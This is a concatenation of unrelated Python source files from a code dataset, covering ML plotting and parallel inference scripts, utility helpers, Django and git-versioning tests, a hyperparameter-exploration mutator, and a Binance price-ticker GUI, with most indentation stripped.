Results = np.zeros((T, K))
for t in range(T):
for k in range(1, K+1):
fname = os.path.join(log_dir,
'{}_k{}_t{}.out'.format(method, k, t))
acc = float(
subprocess.check_output(['./get_acc.sh', fname])\
.decode('utf-8').strip()) * 100
Results[t, k-1] = acc
return Results
def plot_results(Results, label, color):
if len(Results.shape) == 3:
# random baseline
R, T, K = Results.shape
task_average = np.mean(Results, axis=1)
q_lower = np.quantile(task_average, 0.05, axis=0)
q_upper = np.quantile(task_average, 0.95, axis=0)
pylab.fill_between(range(1, K+1), q_lower, q_upper,
alpha=0.2, label=label, color=color)
else: # deterministic selection method
T, K = Results.shape
task_average = np.mean(Results, axis=0)
pylab.plot(range(1, K+1), task_average, label=label, color=color)
def plot_gains(result, random_result, label, color):
random_mean = random_result.mean(axis=0) # marginalize over random seed
gain_each_task = result - random_mean
gain = gain_each_task.mean(axis=0)
pylab.plot(range(1, len(gain)+1), gain, label=label, color=color)
if __name__ == '__main__':
args = parse_args()
if args.label:
assert len(args.label) == len(args.log_dirs)
label = args.label
else:
label = [str(_) for _ in range(1, len(args.log_dirs)+1)]
if args.gain_over_random:
Results = []
for i, d in enumerate(args.log_dirs):
Result = grep_result(d)
if len(Result.shape) == 3:
random_index = i
random_result = Result
else:
Results.append(Result)
for i, result in enumerate(Results):
plot_gains(result, random_result, label[i], colors[i])
pylab.hlines(0, 1, random_result.shape[-1],
colors[random_index], 'dashed', label='random')
#pylab.ylabel(r'$\mathbb{E}_t[acc_t - acc_t^r]$ (%)')
pylab.ylabel('gain over random (%)')
else:
for i, d in enumerate(args.log_dirs):
Results = grep_result(d)
plot_results(Results, label[i], colors[i])
pylab.ylabel(r'$\mathbb{E}_t acc_t$ (%)')
pylab.xlabel('k checkpoints used')
pylab.xticks(range(0, 21, 5), [str(_) for _ in range(0, 21, 5)])
pylab.legend()
pylab.tight_layout()
if args.s:
pylab.savefig(args.s)
else:
pylab.show()
| StarcoderdataPython |
1646434 | <reponame>microsoft/poultry-cafos
"""
Copyright (c) Microsoft Corporation. All rights reserved.
Licensed under the MIT License.
Script for running an inference script in parallel over a list of inputs.
We split the actual list of filenames we want to run on into NUM_GPUS different batches,
save those batches to file, and call `inference.py` multiple times in parallel - pointing
it to a different batch each time.
"""
import subprocess
from multiprocessing import Process
import numpy as np
# list of GPU IDs that we want to use, one job will be started for every ID in the list
GPUS = [0, 0, 1, 1]
TEST_MODE = False # if False then print out the commands to be run, if True then run
# path passed to `--model_fn` in the `inference.py` script
MODEL_FN = "output/train-all_unet_0.5_0.01_rotation_best-checkpoint.pt"
# path passed to `--output_dir` in the `inference.py` script
OUTPUT_DIR = "output/chesapeake-bay-3-18-2021/inference/"
# Get the list of files we want our model to run on
with open("data/naip_chesapeake_bay_2017-2018.csv", "r") as f:
fns = f.read().strip().split("\n")[1:]
# Split the list of files up into approximately equal sized batches based on the number
# of GPUs we want to use. Each worker will then work on NUM_FILES / NUM_GPUS files in
# parallel. Save these batches of the original list to disk (as a simple list of files
# to be consumed by the `inference.py` script)
num_files = len(fns)
num_splits = len(GPUS)
num_files_per_split = np.ceil(num_files / num_splits)
output_fns = []
for split_idx in range(num_splits):
output_fn = "data/runs/chesapeake-bay-3-18-2021_split_%d.csv" % (split_idx)
with open(output_fn, "w") as f:
start_range = int(split_idx * num_files_per_split)
end_range = min(num_files, int((split_idx + 1) * num_files_per_split))
print("Split %d: %d files" % (split_idx + 1, end_range - start_range))
f.write("image_fn\n")
for i in range(start_range, end_range):
end = "" if i == end_range - 1 else "\n"
f.write("%s%s" % (fns[i], end))
output_fns.append(output_fn)
# Start NUM_GPUS worker processes, each pointed to one of the lists of files we saved
# to disk in the previous step.
def do_work(fn, gpu_idx):
command = f"python inference.py --input_fn {fn} --model_fn {MODEL_FN}"
+f" --output_dir {OUTPUT_DIR} --gpu {gpu_idx} --save_soft"
print(command)
if not TEST_MODE:
subprocess.call(command, shell=True)
processes = []
for work, gpu_idx in zip(output_fns, GPUS):
p = Process(target=do_work, args=(work, gpu_idx))
processes.append(p)
p.start()
for p in processes:
p.join()
| StarcoderdataPython |
1640193 | def rotate_to_first_in_deque_and_pop(input_deque, predicate):
"""
Finds the first item in the deque that satisfies the condition by rotating through the deque using popleft().
Faster than doing a sort on the deque.
"""
for _ in xrange(0, len(input_deque)):
item = input_deque.popleft()
if predicate(item):
return item
input_deque.append(item) # Move the item to the end
return None
def pop_first_from_list_or_end(input_list, predicate):
for i in xrange(len(input_list)-1, -1, -1):
if predicate(input_list[i]):
return input_list.pop(i)
return input_list.pop()
def count_if(input_list, predicate):
c = 0
for item in input_list:
if predicate(item):
c += 1
return c
def convert_dictionary(d, keyConverter, valueConverter):
new_dict = {}
for key, value in d.iteritems():
new_dict[keyConverter(key) if keyConverter else key] = valueConverter(value) if valueConverter else value
return new_dict
| StarcoderdataPython |
68555 | from abc import ABC, abstractmethod
class AbstractDisplayService(ABC):
@abstractmethod
def accept_items(self, items):
raise Exception("Not implemented.")
@abstractmethod
def stop(self):
raise Exception("Not implemented.")
| StarcoderdataPython |
1716137 | <gh_stars>0
def countWord(filename, word):
line_count = 0
word_count = 0
with open(filename) as f:
content = f.read()
for line in content.splitlines():
found = line.count(word)
if found:
line_count += 1
word_count += found
return (line_count, word_count)
def countNumber(filename, number):
line_count = 0
word_count = 0
with open(filename) as f:
content = f.read()
for line in content.splitlines():
found = line.count(str(number))
if found:
line_count += 1
word_count += found
return (line_count, word_count)
'''
Copy-paste! Having the same or almost the same code in multiple places
in project increases amount of code to maintain with no good reason.
Above toy example sounds silly, but copy-pastes are harder to find
if they exist as private implementation details scattered throughout repository,
or repetitive boilerplate code in various places in repository.
Or if they are a deeply buried part of large function or class,
inaccessible to potential users.
'''
def countWord(filename, word):
line_count = 0
word_count = 0
with open(filename) as f:
content = f.read()
for line in content.splitlines():
found = line.count(word)
if found:
line_count += 1
word_count += found
return (line_count, word_count)
def countNumber(filename, number):
return countWord(filename, str(number))
def countWord(filename, word):
line_count = 0
word_count = 0
with open(filename) as f:
content = f.read()
for line in content.splitlines():
found = line.count(word)
if found:
line_count += 1
word_count += found
return (line_count, word_count)
def wordCount(filename, word):
def add(acc, line):
words, lines = acc
found = line.count(word)
return words + found, lines + bool(found)
with open(filename) as f:
return reduce(add, f.readlines(), (0, 0))
'''
This is a less trivial example. Both functions do exactly the same thing,
but the language features used are different. Imagine these are in different
places in codebase, with different identifier names. No automatic tool for
finding code duplication is going to find this kind of superfluous code.
Two ways of coping with them would be:
- separation of concerns: solve different problems in different places,
so that you know where to look for building blocks when you have
particular problem. As long as similar logic is in the same place,
it's easier to spot reocurring patterns,
- code review: someone may spot you're reinventing the wheel (or doing
old thing better!), which may result in ending up with only with
solution for given problem - the best of the two
I pick reduce variant. Seems shorter to me.
'''
def countWord(filename, word):
def add(acc, line):
words, lines = acc
found = line.count(word)
return words + found, lines + bool(found)
with open(filename) as f:
return reduce(add, f.readlines(), (0, 0))
| StarcoderdataPython |
1624910 |
import arcade
import math
from miscellaneous import Misc
import Constants
class Arrow:
def __init__(self, x1, y1, x2, y2, x3, y3, color):
self.x1 = x1
self.y1 = y1
self.x2 = x2
self.y2 = y2
self.x3 = x3
self.y3 = y3
self.color = color
def draw(self):
arcade.draw_triangle_filled(self.x1, self.y1, self.x2, self.y2, self.x3, self.y3, self.color)
def update(self,x,y):
self.x1 = x
self.y1 =y
intersections = Misc.circle_intersection(self,(Constants.SCREEN_X/2, Constants.SCREEN_Y/2, Constants.CIRCLE_RADIUS),
(x,y,math.sqrt(pow(x-Constants.SCREEN_X/2,2)+ pow(y-Constants.SCREEN_Y/2,2)- pow(Constants.CIRCLE_RADIUS,2))))
self.x2 = intersections[0]
self.y2= intersections[1]
self.x3 = intersections[2]
self.y3 = intersections[3]
| StarcoderdataPython |
3253593 | <reponame>phungj/MSOE_Comp_Prog_Py
import os
file_path = os.path.join(os.path.dirname(__file__), "sanitized_input.txt")
with open(file_path, 'r') as input:
all_lines = input.readlines()
for i in range(len(all_lines)):
all_lines[i] = all_lines[i].strip("\n")
fields = []
field_ranges = []
index = 0
current_line = all_lines[index]
while not current_line == "":
colon_index = current_line.index(":")
split_current_line = current_line[colon_index + 2:].split(" ")
fields.append(current_line[:colon_index])
field_ranges.append((split_current_line[0], split_current_line[2]))
index += 1
current_line = all_lines[index]
ranges = []
temp_tuple = ()
for field in field_ranges:
temp_tuple = ()
for interval in field:
split_field = interval.split("-")
split_field = [int(s) for s in split_field]
temp_tuple += (range(split_field[0], split_field[1] + 1),)
ranges.append(temp_tuple)
index += 2
your_ticket = all_lines[index]
index += 3
current_line = all_lines[index]
tickets = [your_ticket]
while not current_line == "" and index < 220:
tickets.append(current_line)
index += 1
current_line = all_lines[index]
tickets = [i.split(",") for i in tickets]
indexed_fields = {f: [] for f in range(len(tickets[0]))}
while tickets[0]:
for ticket in tickets:
for i in range(len(ticket)):
indexed_fields.get(i).append(ticket.pop(0))
field_dict = {f: -1 for f in fields}
broken = False
# while fields:
# TODO: Continue here | StarcoderdataPython |
3268613 | '''
@author: <NAME>
@summary: Test cases to make sure sequential execution and process based concurrent execution return
the same response.
'''
from tests.test_concurrency_base import TestBaseConcurrency
from batch_requests.concurrent.executor import ProcessBasedExecutor
class TestProcessConcurrency(TestBaseConcurrency):
'''
Tests sequential and concurrent process based execution.
'''
def get_executor(self):
'''
Returns the executor to use for running tests defined in this suite.
'''
return ProcessBasedExecutor(self.number_workers)
def test_thread_concurrency_response(self):
'''
Make a request with sequential and process based concurrent executor and compare
the response.
'''
self.compare_seq_and_concurrent_req()
def test_duration(self):
'''
Compare that running tests with ProcessBasedConcurreny return faster than running
them sequentially.
'''
self.compare_seq_concurrent_duration()
| StarcoderdataPython |
1703891 | <filename>models/DeepFill_Models/unfold_test.py
import torch
import numpy as np
in_a = np.arange(16)
in_a = np.resize(in_a, (4,4))
in_tensor = np.expand_dims(in_a, 0)
in_tensor = np.expand_dims(in_tensor, 0)
print("input: ")
print(in_tensor)
in_t = torch.from_numpy(in_tensor)
all_patches = in_t.unfold(2, 2, 1).unfold(3, 2, 1)
print("all patches")
print(all_patches[0][0][0][1])
print(all_patches.shape) | StarcoderdataPython |
3224296 | #!/usr/bin/env python3
import requests, json
domain = input("Enter the hostname http://")
response = requests.get("http://"+domain)
print(response.json)
print("Status code: "+str(response.status_code))
print("Headers response: ")
for header, value in response.headers.items():
print(header, '-->', value)
print("Headers request : ")
for header, value in response.request.headers.items():
print(header, '-->', value)
| StarcoderdataPython |
4834901 | <reponame>Yuanoung/djg-master
#!/usr/bin/env python
import os, sys, traceback
import unittest
import django.contrib as contrib
try:
set
except NameError:
from sets import Set as set # For Python 2.3
CONTRIB_DIR_NAME = 'django.contrib'
MODEL_TESTS_DIR_NAME = 'modeltests'
REGRESSION_TESTS_DIR_NAME = 'regressiontests'
TEST_TEMPLATE_DIR = 'templates'
CONTRIB_DIR = os.path.dirname(contrib.__file__)
MODEL_TEST_DIR = os.path.join(os.path.dirname(__file__), MODEL_TESTS_DIR_NAME)
REGRESSION_TEST_DIR = os.path.join(os.path.dirname(__file__), REGRESSION_TESTS_DIR_NAME)
ALWAYS_INSTALLED_APPS = [
'django.contrib.contenttypes',
'django.contrib.auth',
'django.contrib.sites',
'django.contrib.flatpages',
'django.contrib.redirects',
'django.contrib.sessions',
'django.contrib.comments',
'django.contrib.admin',
]
def get_test_models():
models = []
for loc, dirpath in (MODEL_TESTS_DIR_NAME, MODEL_TEST_DIR), (REGRESSION_TESTS_DIR_NAME, REGRESSION_TEST_DIR), (CONTRIB_DIR_NAME, CONTRIB_DIR):
for f in os.listdir(dirpath):
if f.startswith('__init__') or f.startswith('.') or f.startswith('sql') or f.startswith('invalid'):
continue
models.append((loc, f))
return models
def get_invalid_models():
models = []
for loc, dirpath in (MODEL_TESTS_DIR_NAME, MODEL_TEST_DIR), (REGRESSION_TESTS_DIR_NAME, REGRESSION_TEST_DIR), (CONTRIB_DIR_NAME, CONTRIB_DIR):
for f in os.listdir(dirpath):
if f.startswith('__init__') or f.startswith('.') or f.startswith('sql'):
continue
if f.startswith('invalid'):
models.append((loc, f))
return models
class InvalidModelTestCase(unittest.TestCase):
def __init__(self, model_label):
unittest.TestCase.__init__(self)
self.model_label = model_label
def runTest(self):
from django.core.management.validation import get_validation_errors
from django.db.models.loading import load_app
from cStringIO import StringIO
try:
module = load_app(self.model_label)
except Exception, e:
self.fail('Unable to load invalid model module')
# Make sure sys.stdout is not a tty so that we get errors without
# coloring attached (makes matching the results easier). We restore
# sys.stderr afterwards.
orig_stdout = sys.stdout
s = StringIO()
sys.stdout = s
count = get_validation_errors(s, module)
sys.stdout = orig_stdout
s.seek(0)
error_log = s.read()
actual = error_log.split('\n')
expected = module.model_errors.split('\n')
unexpected = [err for err in actual if err not in expected]
missing = [err for err in expected if err not in actual]
self.assert_(not unexpected, "Unexpected Errors: " + '\n'.join(unexpected))
self.assert_(not missing, "Missing Errors: " + '\n'.join(missing))
def django_tests(verbosity, interactive, test_labels):
from django.conf import settings
old_installed_apps = settings.INSTALLED_APPS
old_test_database_name = settings.TEST_DATABASE_NAME
old_root_urlconf = getattr(settings, "ROOT_URLCONF", "")
old_template_dirs = settings.TEMPLATE_DIRS
old_use_i18n = settings.USE_I18N
old_login_url = settings.LOGIN_URL
old_language_code = settings.LANGUAGE_CODE
old_middleware_classes = settings.MIDDLEWARE_CLASSES
# Redirect some settings for the duration of these tests.
settings.INSTALLED_APPS = ALWAYS_INSTALLED_APPS
settings.ROOT_URLCONF = 'urls'
settings.TEMPLATE_DIRS = (os.path.join(os.path.dirname(__file__), TEST_TEMPLATE_DIR),)
settings.USE_I18N = True
settings.LANGUAGE_CODE = 'en'
settings.LOGIN_URL = '/accounts/login/'
settings.MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.middleware.common.CommonMiddleware',
)
settings.SITE_ID = 1
# Load all the ALWAYS_INSTALLED_APPS.
# (This import statement is intentionally delayed until after we
# access settings because of the USE_I18N dependency.)
from django.db.models.loading import get_apps, load_app
get_apps()
# Load all the test model apps.
for model_dir, model_name in get_test_models():
model_label = '.'.join([model_dir, model_name])
try:
# if the model was named on the command line, or
# no models were named (i.e., run all), import
# this model and add it to the list to test.
if not test_labels or model_name in set([label.split('.')[0] for label in test_labels]):
if verbosity >= 1:
print "Importing model %s" % model_name
mod = load_app(model_label)
if mod:
if model_label not in settings.INSTALLED_APPS:
settings.INSTALLED_APPS.append(model_label)
except Exception, e:
sys.stderr.write("Error while importing %s:" % model_name + ''.join(traceback.format_exception(*sys.exc_info())[1:]))
continue
# Add tests for invalid models.
extra_tests = []
for model_dir, model_name in get_invalid_models():
model_label = '.'.join([model_dir, model_name])
if not test_labels or model_name in test_labels:
extra_tests.append(InvalidModelTestCase(model_label))
try:
# Invalid models are not working apps, so we cannot pass them into
# the test runner with the other test_labels
test_labels.remove(model_name)
except ValueError:
pass
# Run the test suite, including the extra validation tests.
from django.test.simple import run_tests
failures = run_tests(test_labels, verbosity=verbosity, interactive=interactive, extra_tests=extra_tests)
if failures:
sys.exit(failures)
# Restore the old settings.
settings.INSTALLED_APPS = old_installed_apps
settings.ROOT_URLCONF = old_root_urlconf
settings.TEMPLATE_DIRS = old_template_dirs
settings.USE_I18N = old_use_i18n
settings.LANGUAGE_CODE = old_language_code
settings.LOGIN_URL = old_login_url
settings.MIDDLEWARE_CLASSES = old_middleware_classes
if __name__ == "__main__":
from optparse import OptionParser
usage = "%prog [options] [model model model ...]"
parser = OptionParser(usage=usage)
parser.add_option('-v','--verbosity', action='store', dest='verbosity', default='0',
type='choice', choices=['0', '1', '2'],
help='Verbosity level; 0=minimal output, 1=normal output, 2=all output')
parser.add_option('--noinput', action='store_false', dest='interactive', default=True,
help='Tells Django to NOT prompt the user for input of any kind.')
parser.add_option('--settings',
help='Python path to settings module, e.g. "myproject.settings". If this isn\'t provided, the DJANGO_SETTINGS_MODULE environment variable will be used.')
options, args = parser.parse_args()
if options.settings:
os.environ['DJANGO_SETTINGS_MODULE'] = options.settings
elif "DJANGO_SETTINGS_MODULE" not in os.environ:
parser.error("DJANGO_SETTINGS_MODULE is not set in the environment. "
"Set it or use --settings.")
django_tests(int(options.verbosity), options.interactive, args)
| StarcoderdataPython |
1695526 | <gh_stars>1-10
import os
import subprocess
import pytest
from . import util
class Git:
def __init__(self, repo_dir):
super().__init__()
self.repo_dir = repo_dir
self._run_git('init', self.repo_dir)
# If GPG sign is enabled, committing fails because there is no
# GPG keys for the used test email addresses.
self._run_git('config', 'commit.gpgsign', 'false')
def get_local_version_string(self):
return self._get_head_sha()[:10]
def create_commit(self):
with open(os.path.join(self.repo_dir, 'dummy.txt'), 'at+') as dummy_file:
dummy_file.seek(0)
change_number = len(dummy_file.read().split('\n'))
dummy_file.write('Dummy change {}\n'.format(change_number))
self._run_git('add', 'dummy.txt')
self._run_git('commit', '-m', 'Dummy change {}'.format(change_number))
def create_tag(self, tag_name):
self._run_git(
'tag',
'-a',
'-m', 'Tag {}'.format(tag_name),
tag_name,
'HEAD',
)
def _get_head_sha(self):
return self._run_git(
'rev-parse', 'HEAD',
stdout=subprocess.PIPE,
).stdout.decode().strip()
def _run_git(self, *args, **kwargs):
kwargs['cwd'] = self.repo_dir
kwargs['check'] = True
environ = kwargs.get('env') or os.environ.copy()
environ['GIT_AUTHOR_NAME'] = 'Setuptools Vcsver Test'
environ['GIT_AUTHOR_EMAIL'] = '<EMAIL>'
environ['GIT_COMMITTER_NAME'] = 'Setuptools Vcsver Test'
environ['GIT_COMMITTER_EMAIL'] = '<EMAIL>'
kwargs['env'] = environ
return util.run('git', *args, **kwargs)
def test_get_version_defined_in_setup_py(test_project):
test_project.set_setup_kwargs(version='2.0')
test_project.assert_current_version('2.0')
vcs = Git(test_project.path)
vcs.create_commit()
vcs.create_commit()
test_project.assert_current_version('2.0')
vcs.create_tag('1.0')
test_project.assert_current_version('2.0')
test_project.set_setup_kwargs(version='2.1')
test_project.assert_current_version('2.1')
@pytest.mark.parametrize(
('setuptools_kwargs', 'dev_version_format_string'),
(
(None, '{tag}.post{dist}+{hash}'),
({'vcsver': {'create_version': 'pep440.post'}}, '{tag}.post{dist}+{hash}'),
({'vcsver': {'create_version': 'pep440.post_with_dev'}}, '{tag}.post0.dev{dist}+{hash}'),
),
)
def test_get_version_from_history(
test_project,
setuptools_kwargs,
dev_version_format_string,
):
if setuptools_kwargs:
test_project.set_setup_kwargs(**setuptools_kwargs)
vcs = Git(test_project.path)
test_project.assert_current_version('{}+dirty'.format(test_project.root_version))
vcs.create_commit()
test_project.assert_current_version(
dev_version_format_string.format(
tag=test_project.root_version,
dist=1,
hash=vcs.get_local_version_string(),
),
)
vcs.create_commit()
vcs.create_commit()
test_project.assert_current_version(
dev_version_format_string.format(
tag=test_project.root_version,
dist=3,
hash=vcs.get_local_version_string(),
),
)
vcs.create_tag('1.0')
test_project.assert_current_version('1.0')
vcs.create_commit()
vcs.create_commit()
test_project.assert_current_version(
dev_version_format_string.format(
tag='1.0',
dist=2,
hash=vcs.get_local_version_string(),
),
)
vcs.create_commit()
vcs.create_commit()
test_project.assert_current_version(
dev_version_format_string.format(
tag='1.0',
dist=4,
hash=vcs.get_local_version_string(),
),
)
def test_configuration_having_version_defined_in_setup_py_and_vcsver_enabled(test_project):
vcs = Git(test_project.path)
test_project.set_setup_kwargs(version='5.0', vcsver=True)
vcs.create_commit()
vcs.create_tag('6.0')
test_project.assert_current_version('6.0')
| StarcoderdataPython |
3292071 | text = '[ Статистика ]<br>Система:<br> Процессор:<br>'
for idx, cpu in enumerate(psutil.cpu_percent(interval=1, percpu=True)):
text += '  Ядро №'+str(idx+1)+': '+str(cpu)+'%<br>'
text += '  Температура: '+str(int(open('/sys/class/thermal/thermal_zone0/temp','r').read())/1000)+' °С\n'
mem = psutil.virtual_memory()
MB = 1024 * 1024
text += ' ОЗУ:<br>  Всего: '+str(int(mem.total / MB))+'MB<br>  Использовано: '+str(int((mem.total - mem.available) / MB))+'MB<br>  Свободно: '+str(int(mem.available / MB))+'MB<br>  Использовано ботом: '+str(int(psutil.Process().memory_info().vms / MB))+'MB<br> '
end_time = time.monotonic()
text += 'Бот:<br>  Время работы: '+str(datetime.timedelta(seconds=end_time - start_time))
text += '\n  Обращений: '+str(uses_kb)
apisay(text,pack['toho'])
| StarcoderdataPython |
3319969 | #!/usr/bin/env python
#
# MagicaVoxel2MinecraftPi
#
from voxel_util import create_voxel, post_to_chat, ply_to_positions, reset_area
from magicavoxel_axis import axis
from all_clear import clear
from time import sleep
# polygon file format exported from MagicaVoxel
ply_files = ['frog1.ply', 'frog2.ply', 'frog3.ply', 'frog4.ply', 'frog5.ply', 'frog4.ply', 'frog3.ply', 'frog2.ply']
# reset_stop
reset_stop = 0.01
# create_stop
create_stop = 0.1
# repeat repeat_count
repeat_count = 50
# reset area
reset_size = (-10, 0, -10, 10, 20, 10)
# Origin to create (Minecraft)
x0 = 0
y0 = 0
z0 = 0
# Rotation degree (MagicaVoxel)
alpha = 0 # x-axis
beta = 0 # y-axis
gamma = 0 # z-axis
model_settings = {
'x0': x0,
'y0': y0,
'z0': z0,
'alpha': alpha,
'beta': beta,
'gamma': gamma,
}
post_to_chat('animation polygon file format model')
box_positions_list = [ply_to_positions(ply_file) for ply_file in ply_files]
clear()
for i in range(repeat_count):
print(i)
reset_area(*reset_size)
sleep(reset_stop)
create_voxel(box_positions_list[i % len(ply_files)], model_settings)
sleep(create_stop)
| StarcoderdataPython |
3345740 | # coding=utf-8
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Explore hparams on a single machine."""
import time
from typing import Any, Callable, Mapping, MutableMapping, Sequence, Tuple
import gin
from learned_optimization.population import population
import numpy as onp
BranchingState = Mapping[str, Any]
@gin.configurable
class BranchingSingleMachine(population.Mutate):
r"""Explore hparams on a single machine!
This is a simple statemachine based mutator.
First, we perturb a hparam in some direction (governed by `mutate_fn`) and try
training in this direction for `explore_steps`.
Once done, we reset, and explore the opposite direction (also governed by
`mutate_fn`) for explore_steps`.
Once done, we select the best direction, reset to the end of that
corresponding explore phase, and continue training for `exploit\_steps`.
This process then repeats.
"""
# this is a simple state machine.
def __init__(self, mutate_fn: Callable[[Any, str, int], Any],
exploit_steps: int, explore_steps: int):
"""Initializer.
Args:
mutate_fn: A deterministic function mapping from hyper parameters, phase
(either "pos" or "neg"), and phase_indx -- or the number of previous
branchings. This should return a new hyper-parameter value.
exploit_steps: number of steps in exploit phase
explore_steps: number of steps in explore phase
"""
self._mutate_fn = mutate_fn
self._exploit_steps = exploit_steps
self._explore_steps = explore_steps
def init(self) -> BranchingState:
return {
"neg": None,
"pos": None,
"center": None,
"center_meta_params": None,
"branch_checkpoint": None,
"start_params": None,
"start_exploit": 0,
"phase": "explore_center",
"phase_idx": 0,
}
def update(
self, state: BranchingState,
current_workers: Sequence[population.ActiveWorker],
cache: MutableMapping[population.GenerationID,
MutableMapping[int, population.Checkpoint]]
) -> Tuple[BranchingState, Sequence[population.ActiveWorker]]:
# copy dict to make pytype happy
state = {**state} # type: MutableMapping[str, Any]
assert len(current_workers) == 1
worker = current_workers[0]
steps = cache[worker.generation_id]
if not steps:
return state, current_workers
def add_worker_to_cache(from_checkpoint: population.Checkpoint,
worker: population.ActiveWorker):
"""Helper function to add a new checkpoint to the cache."""
checkpoint = population.Checkpoint(
generation_id=worker.generation_id,
params=worker.params,
meta_params=worker.meta_params,
parent=(from_checkpoint.generation_id, from_checkpoint.step),
step=worker.step,
value=None,
time=time.time(),
)
if worker.generation_id not in cache:
cache[worker.generation_id] = population.IntKeyDict()
cache[worker.generation_id][worker.step] = checkpoint
if state["branch_checkpoint"] is None:
state["branch_checkpoint"] = steps[0]
state["center"] = steps[0].generation_id
last_checkpoint = steps.values()[-1]
if state["phase"] == "exploit":
# switch to center.
if last_checkpoint.step - state["start_exploit"] >= self._exploit_steps:
meta_params = last_checkpoint.meta_params
genid = population.make_gen_id()
next_workers = [
population.ActiveWorker(last_checkpoint.params, meta_params, genid,
last_checkpoint.step)
]
state["branch_checkpoint"] = last_checkpoint
state["center"] = genid
state["phase"] = "explore_center"
add_worker_to_cache(state["branch_checkpoint"], next_workers[0])
return state, next_workers
else:
return state, current_workers
else:
should_switch = last_checkpoint.step - state[
"branch_checkpoint"].step >= self._explore_steps
if should_switch:
segment = state["phase"].split("_")[-1]
if segment == "center":
# next state is neg
genid = population.make_gen_id()
state["neg"] = genid
state["phase"] = "explore_neg"
meta_params = state["branch_checkpoint"].meta_params
meta_params = self._mutate_fn(meta_params, "pos", state["phase_idx"])
next_workers = [
population.ActiveWorker(state["branch_checkpoint"].params,
meta_params, genid,
state["branch_checkpoint"].step)
]
add_worker_to_cache(state["branch_checkpoint"], next_workers[0])
return state, next_workers
elif segment == "neg":
# next state is pos
genid = population.make_gen_id()
state["pos"] = genid
state["phase"] = "explore_pos"
meta_params = state["branch_checkpoint"].meta_params
meta_params = self._mutate_fn(meta_params, "neg", state["phase_idx"])
next_workers = [
population.ActiveWorker(state["branch_checkpoint"].params,
meta_params, genid,
state["branch_checkpoint"].step)
]
add_worker_to_cache(state["branch_checkpoint"], next_workers[0])
return state, next_workers
# next state is exploit
elif segment == "pos":
take_values_from = state[
"branch_checkpoint"].step + self._explore_steps
center_steps = cache[state["center"]]
neg_steps = cache[state["neg"]]
pos_steps = cache[state["pos"]]
state["center"] = None
state["neg"] = None
state["pos"] = None
state["start_exploit"] = last_checkpoint.step
state["phase"] = "exploit"
state["phase_idx"] += 1
if take_values_from not in center_steps:
raise ValueError(
f"The eval @ step {take_values_from} not there for center? \n {center_steps}"
)
if take_values_from not in neg_steps:
raise ValueError(
f"The eval @ step {take_values_from} not there for neg? \n {neg_steps}"
)
if take_values_from not in pos_steps:
raise ValueError(
f"The eval @ step {take_values_from} not there for pos? \n {pos_steps}"
)
center_score = center_steps[take_values_from].value
neg_score = neg_steps[take_values_from].value
pos_score = pos_steps[take_values_from].value
scores = [center_score, neg_score, pos_score]
idx = onp.nanargmin(scores)
best_checkpoint = [center_steps, neg_steps,
pos_steps][idx].values()[-1]
meta_params = best_checkpoint.meta_params
genid = population.make_gen_id()
next_workers = [
population.ActiveWorker(best_checkpoint.params, meta_params,
genid, best_checkpoint.step)
]
add_worker_to_cache(best_checkpoint, next_workers[0])
return state, next_workers
else:
raise ValueError(f"unknown phase {state['phase']}")
else:
return state, current_workers
| StarcoderdataPython |
9098 | <gh_stars>0
from binance.client import Client
import PySimpleGUI as sg
api_key = "your_binance_apikey"
secret_key = "your_binance_secretkey"
client = Client(api_key=api_key, api_secret=secret_key)
# price
def get_price(coin):
return round(float(client.get_symbol_ticker(symbol=f"{coin}USDT")['price']), 5)
def column_layout_price(coin):
col =[[sg.Text(f"{get_price(coin)}", font=("Arial", 9, 'bold'), size=(10,1), pad=(15,10), key=coin)]]
return col
# 24h percentchange
def price_change_24h(coin):
return round(float(client.get_ticker(symbol=f"{coin}USDT")["priceChangePercent"]), 2)
def column_layout_change(coin):
if price_change_24h(coin) == 0:
return [[sg.Text(f"{price_change_24h(coin)}%", font=("Arial", 9, 'bold'), size=(7,1), pad=(40,10), text_color="black", key=f"{coin}change")]]
elif price_change_24h(coin) > 0:
return [[sg.Text(f"+{price_change_24h(coin)}%", font=("Arial", 9, 'bold'), size=(7,1), pad=(40,10), text_color="green", key=f"{coin}change")]]
return [[sg.Text(f"{price_change_24h(coin)}%", font=("Arial", 9, 'bold'), size=(7,1), pad=(40,10), text_color="red", key=f"{coin}change")]]
def update_24h_change(coin):
if price_change_24h(coin) == 0:
window[f"{coin}change"].update(f"+{price_change_24h(coin)}%", text_color="black")
elif price_change_24h(coin) > 0:
window[f"{coin}change"].update(f"+{price_change_24h(coin)}%", text_color="green")
elif price_change_24h(coin) < 0:
window[f"{coin}change"].update(f"{price_change_24h(coin)}%", text_color="red")
# GUI
sg.theme('DefaultNoMoreNagging')
# Tabs
def tabs(coin):
tab_layout = [[sg.Image("{}.png".format(coin), size=(50,50)),
sg.Text("Price", font=("Arial", 10, 'bold'), size=(7,1), pad=(40,40)), sg.Text("24h change", font=("Arial", 10, 'bold'), size=(10,1), pad=(10,40))],
[sg.Text(f"{coin}/USDT", font=("Arial", 9, 'bold')), sg.Column(column_layout_price(coin)), sg.Column(column_layout_change(coin))]]
return tab_layout
# Layout
layout = [[sg.Text("Crypto Currencies", font=("Arial", 10, 'bold'))],
[sg.TabGroup([[sg.Tab("BTC", tabs("BTC"), border_width="18"), sg.Tab("XRP", tabs("XRP"), border_width="18"), sg.Tab("DOGE", tabs("DOGE"), border_width="18")]])]]
window = sg.Window("NightLeaf Crypto", layout)
def coin_window(*coins):
for coin in coins:
globals()[f"{coin}_last_price"] = 1
while True:
event,values = window.read(timeout=600)
if event == sg.WIN_CLOSED:
break
for coin in coins:
update_24h_change(coin)
price = get_price(coin)
if price != globals()[f"{coin}_last_price"]:
if price > globals()[f"{coin}_last_price"]:
window[f"{coin}"].update(f"{price} 🠕", text_color="green")
elif price < globals()[f"{coin}_last_price"]:
window[f"{coin}"].update(f"{price} 🠗", text_color="red")
globals()[f"{coin}_last_price"] = price
a_list =["BTC", "XRP", "DOGE"]
coin_window(*a_list)
| StarcoderdataPython |
